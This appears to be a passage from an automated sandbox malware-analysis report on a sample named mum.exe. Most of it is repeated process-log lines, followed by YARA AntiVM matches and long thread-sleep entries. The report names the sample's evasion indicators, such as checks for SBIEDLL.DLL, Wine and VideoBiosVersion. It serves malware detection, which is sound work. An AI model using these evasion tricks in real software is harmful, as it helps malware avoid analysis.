Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993717097.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050874977.00000000026E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME VIDEOBIOSVERSION

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2292	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2292	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1972	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2324	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 568	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 568	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 508	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1580	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1748	Thread sleep time: -45877s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1748	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2356	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2524	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 45877	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
